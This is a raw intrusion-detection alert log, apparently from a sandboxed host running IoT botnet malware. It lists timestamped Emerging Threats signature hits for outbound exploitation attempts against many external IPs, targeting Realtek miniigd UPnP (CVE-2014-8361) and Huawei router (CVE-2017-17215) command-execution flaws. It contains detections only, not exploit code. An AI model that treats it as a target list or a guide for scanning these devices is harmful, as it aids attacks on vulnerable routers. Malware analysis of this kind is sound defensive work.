                                                07/20/24-23:05:47.246625TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614027652869192.168.2.14210.22.195.78
                                                07/20/24-23:05:56.993750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615093252869192.168.2.14162.11.26.228
                                                07/20/24-23:05:59.005036TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25830052869192.168.2.14181.109.235.229
                                                07/20/24-23:06:31.522075TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5412252869192.168.2.14185.5.149.16
                                                07/20/24-23:05:40.359417TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5363452869192.168.2.14198.53.78.79
                                                07/20/24-23:05:56.146643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5372252869192.168.2.14111.19.143.182
                                                07/20/24-23:05:57.445837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5521052869192.168.2.1454.23.238.110
                                                07/20/24-23:05:36.083178TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613362052869192.168.2.14136.195.130.35
                                                07/20/24-23:05:37.470289TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25100452869192.168.2.14175.91.47.151
                                                07/20/24-23:06:51.309417TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24920052869192.168.2.14112.180.70.91
                                                07/20/24-23:05:52.504672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25920252869192.168.2.14144.116.128.187
                                                07/20/24-23:05:39.607368TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3694452869192.168.2.14203.216.179.118
                                                07/20/24-23:06:01.795331TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615642052869192.168.2.14149.133.154.242
                                                07/20/24-23:06:02.872548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3957052869192.168.2.14146.10.41.251
                                                07/20/24-23:07:15.422064TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25227052869192.168.2.14122.235.119.72
                                                07/20/24-23:05:59.574335TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614633452869192.168.2.14162.186.165.69
                                                07/20/24-23:05:37.475548TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24561452869192.168.2.14132.232.1.40
                                                07/20/24-23:06:17.411596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4195052869192.168.2.1454.94.45.4
                                                07/20/24-23:05:36.590112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669437215192.168.2.14197.144.144.114
                                                07/20/24-23:05:38.112035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4323052869192.168.2.14185.87.153.101
                                                07/20/24-23:06:06.090759TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614104452869192.168.2.1481.140.159.46
                                                07/20/24-23:06:11.280683TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3995652869192.168.2.14104.173.87.251
                                                07/20/24-23:05:48.777005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862037215192.168.2.14197.248.41.204
                                                07/20/24-23:06:01.235921TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614849452869192.168.2.149.150.51.97
                                                07/20/24-23:05:39.341019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5695452869192.168.2.14143.71.98.5
                                                07/20/24-23:06:01.193709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4814652869192.168.2.14105.123.4.149
                                                07/20/24-23:05:57.017539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5968852869192.168.2.14179.61.198.141
                                                07/20/24-23:06:07.071207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5336252869192.168.2.1438.236.48.150
                                                07/20/24-23:06:13.525153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5433052869192.168.2.1475.228.67.164
                                                07/20/24-23:05:36.324397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655637215192.168.2.1441.243.247.233
                                                07/20/24-23:05:52.450049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24085252869192.168.2.14218.180.53.12
                                                07/20/24-23:07:01.742070TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25203252869192.168.2.14207.237.205.173
                                                07/20/24-23:06:00.744106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613446852869192.168.2.14194.142.88.245
                                                07/20/24-23:06:36.472084TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4633052869192.168.2.1481.227.7.243
                                                07/20/24-23:05:38.534264TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613969652869192.168.2.14217.104.148.40
                                                07/20/24-23:06:13.745204TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613371052869192.168.2.14150.121.79.74
                                                07/20/24-23:06:33.386710TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3454852869192.168.2.14140.249.48.165
                                                07/20/24-23:05:37.593936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476452869192.168.2.14223.210.25.241
                                                07/20/24-23:06:23.185144TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5317452869192.168.2.145.36.215.241
                                                07/20/24-23:06:04.058070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623237215192.168.2.14197.137.84.125
                                                07/20/24-23:07:03.257276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5548452869192.168.2.1448.138.205.15
                                                07/20/24-23:05:34.652423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654237215192.168.2.14197.81.135.223
                                                07/20/24-23:05:40.330643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4826452869192.168.2.14200.224.172.161
                                                07/20/24-23:05:57.851101TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615075652869192.168.2.1460.207.166.164
                                                07/20/24-23:05:57.346978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3914452869192.168.2.1420.149.220.242
                                                07/20/24-23:05:44.673284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3450652869192.168.2.14142.243.145.171
                                                07/20/24-23:05:46.432345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4940452869192.168.2.1461.16.44.183
                                                07/20/24-23:05:52.478141TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23468052869192.168.2.1496.201.129.138
                                                07/20/24-23:05:40.478948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24952852869192.168.2.1451.39.86.197
                                                07/20/24-23:05:52.443193TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24596252869192.168.2.1445.94.223.106
                                                07/20/24-23:05:34.622534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216037215192.168.2.14197.38.238.183
                                                07/20/24-23:05:38.812461TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613945252869192.168.2.14178.152.7.43
                                                07/20/24-23:06:04.603267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3466852869192.168.2.1436.152.244.206
                                                07/20/24-23:05:38.048572TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3588252869192.168.2.14191.156.105.201
                                                07/20/24-23:05:56.439868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614174652869192.168.2.1412.127.100.36
                                                07/20/24-23:06:14.472907TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3805252869192.168.2.14162.105.57.80
                                                07/20/24-23:07:06.909872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4480252869192.168.2.14114.226.21.17
                                                07/20/24-23:07:37.787409TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614614052869192.168.2.14210.193.226.132
                                                07/20/24-23:05:57.037609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5645452869192.168.2.14121.202.104.123
                                                07/20/24-23:06:05.086589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4110052869192.168.2.14108.204.101.233
                                                07/20/24-23:06:38.097414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219437215192.168.2.14157.56.26.35
                                                07/20/24-23:05:55.877930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626237215192.168.2.1441.110.21.53
                                                07/20/24-23:06:18.910197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3424252869192.168.2.14182.231.108.120
                                                07/20/24-23:05:45.374653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129237215192.168.2.14109.209.115.160
                                                07/20/24-23:05:39.324403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613901652869192.168.2.1498.62.200.115
                                                07/20/24-23:05:40.435340TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24866452869192.168.2.14216.209.232.62
                                                07/20/24-23:05:37.469321TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24445852869192.168.2.14193.109.205.113
                                                07/20/24-23:05:45.389146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4399037215192.168.2.14197.185.228.237
                                                07/20/24-23:05:50.554912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740237215192.168.2.14150.97.187.67
                                                07/20/24-23:05:52.472911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4186852869192.168.2.14223.161.15.138
                                                07/20/24-23:06:27.467011TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5781252869192.168.2.1420.101.135.97
                                                07/20/24-23:05:48.787750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5055837215192.168.2.14197.111.230.214
                                                07/20/24-23:05:57.132088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25676252869192.168.2.1438.177.215.154
                                                07/20/24-23:05:37.472951TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25416852869192.168.2.14187.140.68.61
                                                07/20/24-23:05:56.430184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702237215192.168.2.14157.155.102.231
                                                07/20/24-23:05:40.347577TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25864252869192.168.2.14163.182.5.64
                                                07/20/24-23:07:32.121311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5472252869192.168.2.14145.225.20.14
                                                07/20/24-23:06:26.037863TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25428452869192.168.2.1485.157.41.241
                                                07/20/24-23:06:14.583817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3978852869192.168.2.14139.35.146.241
                                                07/20/24-23:05:37.445004TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25072652869192.168.2.1440.31.56.204
                                                07/20/24-23:05:58.930253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23292452869192.168.2.14161.67.254.245
                                                07/20/24-23:06:09.639160TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614002452869192.168.2.14119.77.231.32
                                                07/20/24-23:05:35.607616TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613621652869192.168.2.1443.124.228.32
                                                07/20/24-23:05:40.413313TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25713652869192.168.2.14192.120.138.130
                                                07/20/24-23:05:55.858612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467237215192.168.2.14197.134.29.158
                                                07/20/24-23:05:36.324397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349837215192.168.2.1441.37.255.127
                                                07/20/24-23:05:47.125782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605437215192.168.2.1441.151.54.222
                                                07/20/24-23:07:11.843007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285837215192.168.2.1441.125.143.114
                                                07/20/24-23:06:13.676864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23383452869192.168.2.1459.78.96.71
                                                07/20/24-23:05:40.365973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592852869192.168.2.14174.146.134.66
                                                07/20/24-23:06:01.479448TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24741652869192.168.2.14208.32.105.243
                                                07/20/24-23:06:05.879269TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5049452869192.168.2.1490.96.121.212
                                                07/20/24-23:05:35.234052TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615120252869192.168.2.14154.57.81.200
                                                07/20/24-23:05:35.592228TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614430052869192.168.2.14147.14.244.79
                                                07/20/24-23:07:12.667310TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614206252869192.168.2.1476.0.97.189
                                                07/20/24-23:05:52.483885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4188452869192.168.2.14179.214.191.139
                                                07/20/24-23:05:40.462607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5756852869192.168.2.14101.65.28.197
                                                07/20/24-23:06:11.271256TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24286852869192.168.2.1419.179.160.126
                                                07/20/24-23:05:35.202225TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615546452869192.168.2.14159.94.41.117
                                                07/20/24-23:06:30.636367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3567252869192.168.2.1460.28.102.104
                                                07/20/24-23:05:45.988990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832637215192.168.2.14183.40.55.14
                                                07/20/24-23:05:57.576576TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613676052869192.168.2.1487.236.126.160
                                                07/20/24-23:05:45.460569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5169837215192.168.2.14197.48.23.182
                                                07/20/24-23:05:45.409134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5494837215192.168.2.14211.175.159.1
                                                07/20/24-23:05:47.014311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265437215192.168.2.1441.125.116.67
                                                07/20/24-23:05:35.270124TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614898252869192.168.2.1440.31.56.204
                                                07/20/24-23:05:39.062924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405837215192.168.2.14157.195.87.114
                                                07/20/24-23:06:00.052134TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5644252869192.168.2.14176.101.171.67
                                                07/20/24-23:06:13.720163TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4366852869192.168.2.1457.46.152.49
                                                07/20/24-23:06:05.799314TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24803452869192.168.2.14201.173.204.219
                                                07/20/24-23:05:37.468656TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23426452869192.168.2.1451.84.22.246
                                                07/20/24-23:05:48.775023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451837215192.168.2.1441.95.67.116
                                                07/20/24-23:05:37.575243TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25556252869192.168.2.14180.106.180.212
                                                07/20/24-23:05:42.220682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752037215192.168.2.14151.75.234.147
                                                07/20/24-23:05:59.994984TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3397652869192.168.2.14145.10.127.230
                                                07/20/24-23:05:57.861533TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3728852869192.168.2.14113.89.22.57
                                                07/20/24-23:05:59.983796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5004052869192.168.2.1462.163.164.84
                                                07/20/24-23:05:36.245639TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613840852869192.168.2.148.166.54.209
                                                07/20/24-23:06:14.553922TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613585652869192.168.2.14103.5.225.152
                                                07/20/24-23:05:48.858199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285037215192.168.2.1441.17.10.71
                                                07/20/24-23:05:47.125782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277837215192.168.2.14157.250.216.64
                                                07/20/24-23:06:03.081824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613685252869192.168.2.14115.224.138.67
                                                07/20/24-23:06:29.727366TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613309852869192.168.2.14204.191.187.136
                                                07/20/24-23:06:24.853073TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615640652869192.168.2.14141.15.111.86
                                                07/20/24-23:06:02.385438TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614069652869192.168.2.14176.29.173.73
                                                07/20/24-23:07:15.011261TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5786452869192.168.2.14155.28.129.15
                                                07/20/24-23:06:02.449958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6097852869192.168.2.14101.251.173.173
                                                07/20/24-23:05:36.306429TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4854052869192.168.2.1450.167.84.34
                                                07/20/24-23:05:38.094598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5678452869192.168.2.1447.26.143.30
                                                07/20/24-23:05:40.359038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4890452869192.168.2.1417.225.60.69
                                                07/20/24-23:05:36.328640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716037215192.168.2.14157.69.182.132
                                                07/20/24-23:05:47.965851TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614364452869192.168.2.14156.53.15.210
                                                07/20/24-23:05:57.540063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337652869192.168.2.14199.88.11.180
                                                07/20/24-23:06:25.634766TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5023652869192.168.2.1419.144.127.78
                                                07/20/24-23:07:09.612324TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23700652869192.168.2.14169.178.252.2
                                                07/20/24-23:06:02.508900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5884252869192.168.2.14192.220.114.246
                                                07/20/24-23:05:59.442577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5696252869192.168.2.1479.208.10.184
                                                07/20/24-23:06:24.162612TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25078452869192.168.2.14130.195.197.193
                                                07/20/24-23:06:31.320054TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3608252869192.168.2.1497.168.205.214
                                                07/20/24-23:05:38.610532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615582652869192.168.2.14168.22.240.103
                                                07/20/24-23:05:50.571555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335837215192.168.2.14157.183.60.43
                                                07/20/24-23:05:57.133658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5788852869192.168.2.14198.222.64.107
                                                07/20/24-23:05:57.809291TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4033852869192.168.2.14136.239.147.161
                                                07/20/24-23:05:37.468656TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23624852869192.168.2.14116.132.89.76
                                                07/20/24-23:05:50.559359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443237215192.168.2.1441.2.144.140
                                                07/20/24-23:06:01.306158TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616005252869192.168.2.14194.43.144.215
                                                07/20/24-23:05:57.802006TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5403852869192.168.2.1458.94.23.51
                                                07/20/24-23:05:34.652423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809437215192.168.2.14157.153.180.139
                                                07/20/24-23:05:57.919151TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5603052869192.168.2.14222.212.155.214
                                                07/20/24-23:05:39.047547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061637215192.168.2.1441.80.48.51
                                                07/20/24-23:05:33.833027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680237215192.168.2.14197.88.18.67
                                                07/20/24-23:05:59.330840TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23694252869192.168.2.14189.143.163.228
                                                07/20/24-23:05:39.798839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4882052869192.168.2.14210.179.176.183
                                                07/20/24-23:06:11.477052TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4105852869192.168.2.1480.199.29.190
                                                07/20/24-23:05:58.205142TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25035252869192.168.2.14201.109.19.43
                                                07/20/24-23:05:36.325773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886037215192.168.2.14197.86.146.223
                                                07/20/24-23:05:57.653497TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613336652869192.168.2.14145.135.164.39
                                                07/20/24-23:05:52.525575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4040052869192.168.2.1445.125.38.2
                                                07/20/24-23:05:58.627537TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25927452869192.168.2.14129.194.94.79
                                                07/20/24-23:06:00.005302TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614957052869192.168.2.14109.36.201.204
                                                07/20/24-23:05:39.062924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351037215192.168.2.1441.237.213.46
                                                07/20/24-23:06:00.536999TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23387252869192.168.2.14101.251.173.173
                                                07/20/24-23:05:36.581538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655037215192.168.2.14197.168.201.41
                                                07/20/24-23:05:39.201580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615526652869192.168.2.1478.158.185.24
                                                07/20/24-23:06:01.433779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5401852869192.168.2.1478.100.44.178
                                                07/20/24-23:05:56.066947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283037215192.168.2.14197.154.98.206
                                                07/20/24-23:06:01.884914TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614545452869192.168.2.14222.134.31.216
                                                07/20/24-23:05:33.830570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611637215192.168.2.14157.184.79.183
                                                07/20/24-23:05:48.841499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628637215192.168.2.14117.101.213.42
                                                07/20/24-23:05:57.109755TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4559052869192.168.2.14140.147.162.187
                                                07/20/24-23:05:33.852857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4454437215192.168.2.14197.70.47.135
                                                07/20/24-23:05:42.257816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677637215192.168.2.14157.187.149.53
                                                07/20/24-23:05:59.930873TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615063652869192.168.2.14205.207.74.168
                                                07/20/24-23:06:03.046089TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614195452869192.168.2.14178.124.97.10
                                                07/20/24-23:05:56.083085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063637215192.168.2.14197.75.34.65
                                                07/20/24-23:05:38.677347TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3375652869192.168.2.14114.38.170.24
                                                07/20/24-23:05:39.765891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284837215192.168.2.14155.134.155.192
